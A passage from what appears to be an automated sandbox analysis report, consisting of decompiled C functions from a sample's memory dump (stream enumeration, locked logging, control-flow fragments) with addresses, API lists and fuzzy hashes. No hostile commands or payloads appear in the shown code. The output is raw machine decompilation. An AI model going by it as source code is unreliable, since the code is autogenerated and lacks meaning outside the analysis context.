							 *[fs:0x0] =  *((intOrPtr*)(_t389 - 0xc));
							return _t226;
						}
						_t288 =  *(_t389 + 0x30);
						__eflags = _t288 - _t306;
						if(_t288 != _t306) {
							 *(_t389 + 0xc) = _t306;
							_t365 = _t389 + 0xc;
							 *(_t389 - 4) = 6;
							 *( *_t288)(_t288, 0xb8d200, _t365);
							__eflags =  *(_t389 + 0xc) - _t306;
							if( *(_t389 + 0xc) == _t306) {
								L62:
								 *(_t389 - 0x68) = _t306;
								 *(_t389 - 0x64) = _t306;
								 *(_t389 - 0x54) = _t306;
								 *(_t389 - 0x58) =  *(_t389 - 0x58) & 0x00000000;
								 *(_t389 - 4) = 7;
								_t384 = L00B29ABA(_t389 - 0x68,  *((intOrPtr*)(_t389 + 0x10)),  *((intOrPtr*)(_t389 - 0x24)));
								__eflags = _t384 - _t306;
								if(__eflags != 0) {
									L64:
									L00B6B300( *(_t389 - 0x68));
									L65:
									_t284 =  *(_t389 + 0xc);
									 *(_t389 - 4) = 5;
									__eflags = _t284 - _t306;
									if(_t284 != _t306) {
										_t284 =  *((intOrPtr*)( *_t284 + 8))(_t284);
									}
									goto L67;
								}
								L00B279AA(_t389 - 0xfc, _t365, __eflags);
								_t384 = L00B29BAA(_t389 - 0x68,  *(_t389 - 0x20),  *(_t389 - 0x1c),  *((intOrPtr*)(_t389 + 0x24)),  *(_t389 + 0x30),  *((intOrPtr*)(_t389 + 0x2c)));
								__eflags = _t384 - _t306;
								if(__eflags == 0) {
									_push(_t389 - 0xac);
									L00B27A55(_t389 - 0xfc, _t365, __eflags);
									L00B6B300( *(_t389 - 0x68));
									_t297 =  *(_t389 + 0xc);
									 *(_t389 - 4) = 5;
									__eflags = _t297 - _t306;
									if(_t297 != _t306) {
										_t297 =  *((intOrPtr*)( *_t297 + 8))(_t297);
									}
									E00B11E89(_t297,  *((intOrPtr*)(_t389 - 0x48)));
									_t299 =  *(_t389 + 0x30);
									 *(_t389 - 4) =  *(_t389 - 4) | 0xffffffff;
									__eflags = _t299 - _t306;
									if(_t299 != _t306) {
										 *((intOrPtr*)( *_t299 + 8))(_t299);
									}
									L74:
									_t244 = L00B7F440(L00B7F440( *((intOrPtr*)(_t389 - 0x24)), _t306,  *(_t389 - 0x10), _t306), _t365,  *(_t389 - 0x20),  *(_t389 - 0x1c));
									__eflags =  *((intOrPtr*)(_t389 + 0x2c)) - _t306;
									_t385 = _t244;
									_t371 = _t365;
									 *(_t389 - 0x8c) = _t385;
									 *(_t389 - 0x88) = _t371;
									 *(_t389 - 0x84) = _t385;
									 *(_t389 - 0x80) = _t371;
									 *(_t389 - 0x7c) = 1;
									 *(_t389 - 0x78) = _t306;
									if( *((intOrPtr*)(_t389 + 0x2c)) == _t306) {
										L80:
										_t245 = L00B27C89(_t389 - 0xac, _t385, _t371);
										_t322 =  *((intOrPtr*)(_t389 + 0x14));
										 *_t322 = _t245;
										 *(_t322 + 4) = _t365;
										_t246 = L00B27B92(_t306, _t389 - 0xac, _t371, _t385, _t403);
										_t324 =  *((intOrPtr*)(_t389 + 0x18));
										 *_t324 = _t246;
										 *(_t324 + 4) = _t365;
										_t226 = 0;
										__eflags = 0;
										goto L81;
									}
									__eflags =  *((char*)(_t389 + 0x34));
									if( *((char*)(_t389 + 0x34)) != 0) {
										__eflags = _t385 | _t371;
										if((_t385 | _t371) == 0) {
											_t244 = L00B7F440( *(_t389 - 0x10), _t306,  *(_t389 - 0x20),  *(_t389 - 0x1c));
										}
										__eflags = 0;
										_t249 = L00B7F440( *((intOrPtr*)(_t389 + 0x1c)), 0, _t244, _t365);
										_t328 = 8;
										_t251 = L00B27C89(_t389 - 0xac, L00B7F400(_t249, _t328, _t365), _t365);
										_t365 = _t389 - 0xac;
										E00B2A1B2(_t306,  *((intOrPtr*)(_t389 + 0x2c)), _t365, _t371, _t385, __eflags, _t403,  *((intOrPtr*)(_t389 + 0x20)), _t251, _t365,  *((intOrPtr*)(_t389 + 0x3c)),  *((intOrPtr*)(_t389 + 0x40)),  *((intOrPtr*)(_t389 + 0x44)),  *((intOrPtr*)(_t389 + 0x38)));
									}
									_t226 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t389 + 0x2c)))) + 8))();
									__eflags = _t226 - _t306;
									if(_t226 != _t306) {
										goto L81;
									} else {
										goto L80;
									}
								}
								goto L64;
							}
							_t384 = L00B1D2A8( *(_t389 + 0xc), _t306);
							__eflags = _t384 - _t306;
							if(_t384 != _t306) {
								goto L65;
							}
							goto L62;
						}
						E00B11E89(_t288,  *((intOrPtr*)(_t389 - 0x48)));
						_t303 =  *(_t389 + 0x30);
						 *(_t389 - 4) =  *(_t389 - 4) | 0xffffffff;
						__eflags = _t303 - _t306;
						if(_t303 != _t306) {
							 *((intOrPtr*)( *_t303 + 8))(_t303);
						}
						goto L59;
					}
				}
			}



















































                                                                                                                    0x00b2e153
                                                                                                                    0x00b2e158
                                                                                                                    0x00b2e15d
                                                                                                                    0x00b2e166
                                                                                                                    0x00b2e168
                                                                                                                    0x00b2e16e
                                                                                                                    0x00b2e171
                                                                                                                    0x00b2e174
                                                                                                                    0x00b2e175
                                                                                                                    0x00b2e177
                                                                                                                    0x00b2e177
                                                                                                                    0x00b2e17d
                                                                                                                    0x00b2e18a
                                                                                                                    0x00b2e4db
                                                                                                                    0x00b2e4db
                                                                                                                    0x00000000
                                                                                                                    0x00b2e190
                                                                                                                    0x00b2e192
                                                                                                                    0x00b2e195
                                                                                                                    0x00b2e197
                                                                                                                    0x00b2e197
                                                                                                                    0x00b2e1bd
                                                                                                                    0x00b2e1c2
                                                                                                                    0x00b2e1c7
                                                                                                                    0x00b2e1ca
                                                                                                                    0x00b2e1cc
                                                                                                                    0x00b2e1d3
                                                                                                                    0x00b2e1d3
                                                                                                                    0x00b2e1d6
                                                                                                                    0x00b2e1d9
                                                                                                                    0x00b2e1e2
                                                                                                                    0x00b2e1e8
                                                                                                                    0x00b2e1eb
                                                                                                                    0x00b2e1ee
                                                                                                                    0x00b2e1fe
                                                                                                                    0x00b2e205
                                                                                                                    0x00b2e20e
                                                                                                                    0x00b2e20f
                                                                                                                    0x00b2e215
                                                                                                                    0x00b2e21a
                                                                                                                    0x00b2e21e
                                                                                                                    0x00b2e23a
                                                                                                                    0x00b2e23a
                                                                                                                    0x00b2e220
                                                                                                                    0x00b2e220
                                                                                                                    0x00b2e22a
                                                                                                                    0x00b2e22a
                                                                                                                    0x00b2e231
                                                                                                                    0x00b2e233
                                                                                                                    0x00b2e233
                                                                                                                    0x00b2e23c
                                                                                                                    0x00b2e240
                                                                                                                    0x00b2e245
                                                                                                                    0x00b2e248
                                                                                                                    0x00b2e24d
                                                                                                                    0x00b2e24f
                                                                                                                    0x00b2e264
                                                                                                                    0x00b2e266
                                                                                                                    0x00b2e26a
                                                                                                                    0x00b2e26d
                                                                                                                    0x00b2e358
                                                                                                                    0x00b2e358
                                                                                                                    0x00b2e35b
                                                                                                                    0x00b2e35e
                                                                                                                    0x00b2e3ab
                                                                                                                    0x00b2e3ab
                                                                                                                    0x00b2e3ae
                                                                                                                    0x00b2e3b1
                                                                                                                    0x00b2e3e5
                                                                                                                    0x00b2e3eb
                                                                                                                    0x00b2e3f4
                                                                                                                    0x00b2e3f9
                                                                                                                    0x00b2e3fb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e40d
                                                                                                                    0x00b2e40e
                                                                                                                    0x00b2e413
                                                                                                                    0x00b2e415
                                                                                                                    0x00b2e418
                                                                                                                    0x00b2e43b
                                                                                                                    0x00b2e43b
                                                                                                                    0x00b2e442
                                                                                                                    0x00000000
                                                                                                                    0x00b2e442
                                                                                                                    0x00b2e41d
                                                                                                                    0x00b2e41d
                                                                                                                    0x00b2e420
                                                                                                                    0x00b2e420
                                                                                                                    0x00b2e423
                                                                                                                    0x00b2e425
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e427
                                                                                                                    0x00b2e429
                                                                                                                    0x00b2e432
                                                                                                                    0x00b2e432
                                                                                                                    0x00b2e433
                                                                                                                    0x00b2e436
                                                                                                                    0x00b2e439
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e439
                                                                                                                    0x00b2e42b
                                                                                                                    0x00b2e42e
                                                                                                                    0x00b2e430
                                                                                                                    0x00b2e477
                                                                                                                    0x00000000
                                                                                                                    0x00b2e477
                                                                                                                    0x00000000
                                                                                                                    0x00b2e430
                                                                                                                    0x00000000
                                                                                                                    0x00b2e420
                                                                                                                    0x00b2e3b3
                                                                                                                    0x00b2e3b3
                                                                                                                    0x00b2e3b5
                                                                                                                    0x00b2e3bc
                                                                                                                    0x00b2e3bf
                                                                                                                    0x00b2e3c4
                                                                                                                    0x00b2e3c6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3cc
                                                                                                                    0x00b2e3cf
                                                                                                                    0x00b2e3d1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3d7
                                                                                                                    0x00b2e3dd
                                                                                                                    0x00b2e3e0
                                                                                                                    0x00b2e3e3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3e3
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3b5
                                                                                                                    0x00b2e360
                                                                                                                    0x00b2e363
                                                                                                                    0x00b2e36e
                                                                                                                    0x00b2e374
                                                                                                                    0x00b2e375
                                                                                                                    0x00b2e37b
                                                                                                                    0x00b2e37e
                                                                                                                    0x00b2e381
                                                                                                                    0x00b2e381
                                                                                                                    0x00b2e385
                                                                                                                    0x00b2e38a
                                                                                                                    0x00b2e38d
                                                                                                                    0x00b2e38f
                                                                                                                    0x00b2e38f
                                                                                                                    0x00b2e38f
                                                                                                                    0x00b2e38f
                                                                                                                    0x00b2e392
                                                                                                                    0x00b2e394
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e39a
                                                                                                                    0x00b2e3a0
                                                                                                                    0x00b2e3a4
                                                                                                                    0x00b2e3a7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3a9
                                                                                                                    0x00b2e3a9
                                                                                                                    0x00000000
                                                                                                                    0x00b2e3a9
                                                                                                                    0x00000000
                                                                                                                    0x00b2e363
                                                                                                                    0x00b2e273
                                                                                                                    0x00b2e276
                                                                                                                    0x00b2e279
                                                                                                                    0x00b2e27f
                                                                                                                    0x00b2e285
                                                                                                                    0x00b2e28d
                                                                                                                    0x00b2e28d
                                                                                                                    0x00b2e290
                                                                                                                    0x00b2e298
                                                                                                                    0x00b2e29c
                                                                                                                    0x00b2e2a1
                                                                                                                    0x00b2e2a3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e2a9
                                                                                                                    0x00b2e2ab
                                                                                                                    0x00b2e450
                                                                                                                    0x00b2e46a
                                                                                                                    0x00b2e46d
                                                                                                                    0x00000000
                                                                                                                    0x00b2e472
                                                                                                                    0x00b2e2b1
                                                                                                                    0x00b2e2b4
                                                                                                                    0x00b2e2c2
                                                                                                                    0x00b2e2c6
                                                                                                                    0x00b2e2c8
                                                                                                                    0x00b2e2cb
                                                                                                                    0x00b2e2e3
                                                                                                                    0x00b2e2e6
                                                                                                                    0x00b2e2ea
                                                                                                                    0x00b2e2f0
                                                                                                                    0x00b2e2f6
                                                                                                                    0x00b2e2fc
                                                                                                                    0x00b2e302
                                                                                                                    0x00b2e305
                                                                                                                    0x00b2e308
                                                                                                                    0x00b2e30a
                                                                                                                    0x00b2e30e
                                                                                                                    0x00b2e312
                                                                                                                    0x00b2e312
                                                                                                                    0x00b2e318
                                                                                                                    0x00b2e321
                                                                                                                    0x00b2e324
                                                                                                                    0x00b2e327
                                                                                                                    0x00b2e329
                                                                                                                    0x00b2e32e
                                                                                                                    0x00b2e32e
                                                                                                                    0x00b2e334
                                                                                                                    0x00b2e338
                                                                                                                    0x00b2e33d
                                                                                                                    0x00b2e343
                                                                                                                    0x00b2e347
                                                                                                                    0x00b2e34e
                                                                                                                    0x00b2e352
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e352
                                                                                                                    0x00b2e2d9
                                                                                                                    0x00b2e2db
                                                                                                                    0x00b2e2dd
                                                                                                                    0x00b2e457
                                                                                                                    0x00b2e45a
                                                                                                                    0x00b2e45e
                                                                                                                    0x00b2e460
                                                                                                                    0x00b2e465
                                                                                                                    0x00b2e465
                                                                                                                    0x00b2e468
                                                                                                                    0x00000000
                                                                                                                    0x00b2e468
                                                                                                                    0x00000000
                                                                                                                    0x00b2e2dd
                                                                                                                    0x00b2e44c
                                                                                                                    0x00000000
                                                                                                                    0x00b2e251
                                                                                                                    0x00b2e251
                                                                                                                    0x00b2e251
                                                                                                                    0x00b2e258
                                                                                                                    0x00b2e258
                                                                                                                    0x00b2e25d
                                                                                                                    0x00b2e25d
                                                                                                                    0x00b2e478
                                                                                                                    0x00b2e478
                                                                                                                    0x00b2e47f
                                                                                                                    0x00000000
                                                                                                                    0x00b2e47f
                                                                                                                    0x00b2e489
                                                                                                                    0x00b2e489
                                                                                                                    0x00b2e48f
                                                                                                                    0x00b2e496
                                                                                                                    0x00b2e4a4
                                                                                                                    0x00b2e4b0
                                                                                                                    0x00b2e4b2
                                                                                                                    0x00b2e4b4
                                                                                                                    0x00b2e577
                                                                                                                    0x00b2e57a
                                                                                                                    0x00b2e57f
                                                                                                                    0x00b2e582
                                                                                                                    0x00b2e586
                                                                                                                    0x00b2e589
                                                                                                                    0x00b2e58e
                                                                                                                    0x00b2e58e
                                                                                                                    0x00b2e591
                                                                                                                    0x00b2e591
                                                                                                                    0x00b2e6b1
                                                                                                                    0x00b2e6b7
                                                                                                                    0x00b2e6bf
                                                                                                                    0x00b2e6bf
                                                                                                                    0x00b2e4ba
                                                                                                                    0x00b2e4bd
                                                                                                                    0x00b2e4bf
                                                                                                                    0x00b2e4e5
                                                                                                                    0x00b2e4ea
                                                                                                                    0x00b2e4f4
                                                                                                                    0x00b2e4f8
                                                                                                                    0x00b2e4fa
                                                                                                                    0x00b2e4fd
                                                                                                                    0x00b2e511
                                                                                                                    0x00b2e511
                                                                                                                    0x00b2e514
                                                                                                                    0x00b2e517
                                                                                                                    0x00b2e51d
                                                                                                                    0x00b2e524
                                                                                                                    0x00b2e530
                                                                                                                    0x00b2e532
                                                                                                                    0x00b2e534
                                                                                                                    0x00b2e55e
                                                                                                                    0x00b2e561
                                                                                                                    0x00b2e566
                                                                                                                    0x00b2e566
                                                                                                                    0x00b2e569
                                                                                                                    0x00b2e56d
                                                                                                                    0x00b2e56f
                                                                                                                    0x00b2e574
                                                                                                                    0x00b2e574
                                                                                                                    0x00000000
                                                                                                                    0x00b2e56f
                                                                                                                    0x00b2e53c
                                                                                                                    0x00b2e558
                                                                                                                    0x00b2e55a
                                                                                                                    0x00b2e55c
                                                                                                                    0x00b2e5a4
                                                                                                                    0x00b2e5a5
                                                                                                                    0x00b2e5ad
                                                                                                                    0x00b2e5b2
                                                                                                                    0x00b2e5b5
                                                                                                                    0x00b2e5b9
                                                                                                                    0x00b2e5bb
                                                                                                                    0x00b2e5c0
                                                                                                                    0x00b2e5c0
                                                                                                                    0x00b2e5c6
                                                                                                                    0x00b2e5cb
                                                                                                                    0x00b2e5ce
                                                                                                                    0x00b2e5d2
                                                                                                                    0x00b2e5d5
                                                                                                                    0x00b2e5da
                                                                                                                    0x00b2e5da
                                                                                                                    0x00b2e5dd
                                                                                                                    0x00b2e5f2
                                                                                                                    0x00b2e5f7
                                                                                                                    0x00b2e5fa
                                                                                                                    0x00b2e5fc
                                                                                                                    0x00b2e5fe
                                                                                                                    0x00b2e604
                                                                                                                    0x00b2e60a
                                                                                                                    0x00b2e610
                                                                                                                    0x00b2e613
                                                                                                                    0x00b2e61a
                                                                                                                    0x00b2e61d
                                                                                                                    0x00b2e687
                                                                                                                    0x00b2e68f
                                                                                                                    0x00b2e694
                                                                                                                    0x00b2e697
                                                                                                                    0x00b2e699
                                                                                                                    0x00b2e6a2
                                                                                                                    0x00b2e6a7
                                                                                                                    0x00b2e6aa
                                                                                                                    0x00b2e6ac
                                                                                                                    0x00b2e6af
                                                                                                                    0x00b2e6af
                                                                                                                    0x00000000
                                                                                                                    0x00b2e6af
                                                                                                                    0x00b2e61f
                                                                                                                    0x00b2e623
                                                                                                                    0x00b2e627
                                                                                                                    0x00b2e629
                                                                                                                    0x00b2e635
                                                                                                                    0x00b2e635
                                                                                                                    0x00b2e63c
                                                                                                                    0x00b2e642
                                                                                                                    0x00b2e649
                                                                                                                    0x00b2e657
                                                                                                                    0x00b2e670
                                                                                                                    0x00b2e676
                                                                                                                    0x00b2e676
                                                                                                                    0x00b2e680
                                                                                                                    0x00b2e683
                                                                                                                    0x00b2e685
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e685
                                                                                                                    0x00000000
                                                                                                                    0x00b2e55c
                                                                                                                    0x00b2e50b
                                                                                                                    0x00b2e50d
                                                                                                                    0x00b2e50f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2e50f
                                                                                                                    0x00b2e4c4
                                                                                                                    0x00b2e4c9
                                                                                                                    0x00b2e4cc
                                                                                                                    0x00b2e4d0
                                                                                                                    0x00b2e4d3
                                                                                                                    0x00b2e4d8
                                                                                                                    0x00b2e4d8
                                                                                                                    0x00000000
                                                                                                                    0x00b2e4d3
                                                                                                                    0x00b2e1ee

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldiv$H_prolog
                                                                                                                    • String ID: x$x
                                                                                                                    • API String ID: 2300968129-177600594
                                                                                                                    • Opcode ID: dad2779b0131dd15280f79465e08505633871aec9b97610c0d23e6947492cf42
                                                                                                                    • Instruction ID: d745b9d68c289c0dd88a9e783e050b13ddbb6cf825ee7434517d9d9f38ca006f
                                                                                                                    • Opcode Fuzzy Hash: dad2779b0131dd15280f79465e08505633871aec9b97610c0d23e6947492cf42
                                                                                                                    • Instruction Fuzzy Hash: DF125871900229EFCF20EFA5D880AEDBBF5FF48314F2485A9E829A7251D7349D85CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B167B1 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00B167B1(intOrPtr* __ecx, void* __eflags) {
				long _t21;
				signed int _t25;
				void* _t34;
				intOrPtr* _t48;
				void* _t50;
				intOrPtr _t57;

				L00B7F140(E00B82EC0, _t50);
				_t48 = __ecx;
				if(E00B16581(__ecx) == 0) {
					L12:
					_t21 = 0;
				} else {
					_t57 =  *0xb9a5cc; // 0x777842f0
					if(_t57 != 0) {
						SetLastError(0);
						_t34 = E00B18760( *((intOrPtr*)(_t50 + 8)));
						if(_t34 != 1) {
							_t2 = _t50 - 0x270; // -624
							 *_t48 =  *0xb9a5cc( *((intOrPtr*)(_t50 + 8)), 0, _t2, 0);
						}
						if( *_t48 != 0xffffffff) {
							L13:
							_t16 = _t50 - 0x270; // -624
							E00B16894(_t16,  *((intOrPtr*)(_t50 + 0xc)));
							_t21 = 1;
						} else {
							if(GetLastError() == 0x26) {
								goto L12;
							} else {
								if(_t34 != 0) {
									_t4 = _t50 - 0x18; // -24
									_t25 = E00B12D90(_t4);
									_t8 = _t50 - 0x18; // -24
									 *(_t50 - 4) = 0;
									if(E00B18869( *((intOrPtr*)(_t50 + 8)), _t8, _t50, _t25 & 0xffffff00 | _t34 != 0x00000001) != 0) {
										_t10 = _t50 - 0x270; // -624
										 *_t48 =  *0xb9a5cc( *((intOrPtr*)(_t50 - 0x18)), 0, _t10, 0);
									}
									 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
									E00B11E89(_t27,  *((intOrPtr*)(_t50 - 0x18)));
								}
								if( *_t48 != 0xffffffff) {
									goto L13;
								} else {
									goto L12;
								}
							}
						}
					} else {
						SetLastError(0x78);
						goto L12;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t21;
			}









                                                                                                                    0x00b167b6
                                                                                                                    0x00b167c4
                                                                                                                    0x00b167cd
                                                                                                                    0x00b1686f
                                                                                                                    0x00b1686f
                                                                                                                    0x00b167d3
                                                                                                                    0x00b167d5
                                                                                                                    0x00b167db
                                                                                                                    0x00b167eb
                                                                                                                    0x00b167f9
                                                                                                                    0x00b167fe
                                                                                                                    0x00b16800
                                                                                                                    0x00b16812
                                                                                                                    0x00b16812
                                                                                                                    0x00b16817
                                                                                                                    0x00b16873
                                                                                                                    0x00b16876
                                                                                                                    0x00b1687c
                                                                                                                    0x00b16881
                                                                                                                    0x00b16819
                                                                                                                    0x00b16822
                                                                                                                    0x00000000
                                                                                                                    0x00b16824
                                                                                                                    0x00b16826
                                                                                                                    0x00b16828
                                                                                                                    0x00b1682b
                                                                                                                    0x00b1683a
                                                                                                                    0x00b1683d
                                                                                                                    0x00b16847
                                                                                                                    0x00b16849
                                                                                                                    0x00b1685b
                                                                                                                    0x00b1685b
                                                                                                                    0x00b16860
                                                                                                                    0x00b16864
                                                                                                                    0x00b16869
                                                                                                                    0x00b1686d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1686d
                                                                                                                    0x00b16822
                                                                                                                    0x00b167dd
                                                                                                                    0x00b167df
                                                                                                                    0x00000000
                                                                                                                    0x00b167df
                                                                                                                    0x00b167db
                                                                                                                    0x00b16889
                                                                                                                    0x00b16891

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B167B6
                                                                                                                      • Part of subcall function 00B16581: FindClose.KERNELBASE(00000000,?,00B165B9), ref: 00B1658C
                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,?), ref: 00B167DF
                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,?), ref: 00B167EB
                                                                                                                    • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00B1680C
                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00B16819
                                                                                                                    • FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 00B16855
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFindLast$FirstStream$CloseH_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1050961465-0
                                                                                                                    • Opcode ID: 67d43cbb4ce7d05a163a4985fbbcdcd117767b05894dc00d28f19510103ae0b4
                                                                                                                    • Instruction ID: 477a8bebc58af5a7f33493de1e0f8f8da311f2569214863ca260658361a94c1b
                                                                                                                    • Opcode Fuzzy Hash: 67d43cbb4ce7d05a163a4985fbbcdcd117767b05894dc00d28f19510103ae0b4
                                                                                                                    • Instruction Fuzzy Hash: 74218031900206EFCB24AFA5D8898FEBBB5FF91721FA042AAE855531A0CB314DC5DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B44CB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E00B44CB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v16;
				void* __ebp;
				void* _t33;
				intOrPtr _t48;
				intOrPtr _t67;
				void* _t69;

				EnterCriticalSection(0xb9a878);
				if(_a8 != 0) {
					_t67 = _a4;
					 *((intOrPtr*)(_t67 + 0x158)) =  *((intOrPtr*)(_t67 + 0x158)) + 1;
					asm("adc [eax+0x4], ebx");
					 *((intOrPtr*)(_t67 + 0x150)) =  *((intOrPtr*)(_t67 + 0x150)) + 1;
					asm("adc [eax+0x4], ebx");
					if( *(_t67 + 0xcc) != 0) {
						E00B44839(_t67);
						E00B126D9( &_v16);
						E00B44BDB(_a8, _a12, _t69,  &_v16);
						fputs(_v16,  *( *(_t67 + 0xcc)));
						if( *((intOrPtr*)(_t67 + 0x108)) != 0) {
							fputs(" : ",  *( *(_t67 + 0xcc)));
							E00B12155(_t67 + 0x104);
						}
						E00B11FE9( *(_t67 + 0xcc));
						E00B11E89(L00B11FDA( *(_t67 + 0xcc)), _v16);
					}
				} else {
					_t48 = _a4;
					if( *((intOrPtr*)(_t48 + 0xbc)) != 0) {
						 *((intOrPtr*)(_t48 + 0x34)) = 0;
						 *((char*)( *((intOrPtr*)(_t48 + 0x30)))) = 0;
						 *((intOrPtr*)(_t48 + 0x40)) = 0;
						 *((short*)( *((intOrPtr*)(_t48 + 0x3c)))) = 0;
						 *((intOrPtr*)(_t48 + 0x28)) =  *((intOrPtr*)(_t48 + 0x28)) + 1;
						asm("adc [eax+0x2c], ebx");
					}
				}
				_t33 = L00B4574E();
				LeaveCriticalSection(0xb9a878);
				return _t33;
			}









                                                                                                                    0x00b44cc2
                                                                                                                    0x00b44ccd
                                                                                                                    0x00b44cfb
                                                                                                                    0x00b44cfe
                                                                                                                    0x00b44d0b
                                                                                                                    0x00b44d0e
                                                                                                                    0x00b44d1b
                                                                                                                    0x00b44d24
                                                                                                                    0x00b44d29
                                                                                                                    0x00b44d31
                                                                                                                    0x00b44d40
                                                                                                                    0x00b44d56
                                                                                                                    0x00b44d60
                                                                                                                    0x00b44d6f
                                                                                                                    0x00b44d80
                                                                                                                    0x00b44d80
                                                                                                                    0x00b44d8b
                                                                                                                    0x00b44d9e
                                                                                                                    0x00b44da4
                                                                                                                    0x00b44ccf
                                                                                                                    0x00b44ccf
                                                                                                                    0x00b44cd8
                                                                                                                    0x00b44ce1
                                                                                                                    0x00b44ce4
                                                                                                                    0x00b44ce9
                                                                                                                    0x00b44cec
                                                                                                                    0x00b44cef
                                                                                                                    0x00b44cf3
                                                                                                                    0x00b44cf3
                                                                                                                    0x00b44cd8
                                                                                                                    0x00b44da5
                                                                                                                    0x00b44db1
                                                                                                                    0x00b44dbc

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00B9A878), ref: 00B44CC2
                                                                                                                    • fputs.MSVCRT ref: 00B44D56
                                                                                                                    • fputs.MSVCRT ref: 00B44D6F
                                                                                                                    • LeaveCriticalSection.KERNEL32(00B9A878), ref: 00B44DB1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3346953513-3653984579
                                                                                                                    • Opcode ID: 650bb6ad9c62478a99e4c1803f02c4fd680e1fd91403e2808df73fecf2e802a7
                                                                                                                    • Instruction ID: 9921a830e3b8eabc0bba927baa263d375701d207c3815ad7be1501ffa48c55c4
                                                                                                                    • Opcode Fuzzy Hash: 650bb6ad9c62478a99e4c1803f02c4fd680e1fd91403e2808df73fecf2e802a7
                                                                                                                    • Instruction Fuzzy Hash: 7F31B831901604EFDB50EFA4D894ED9B7F4FF44324F1084AEE95A9B262DB30A945DF20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

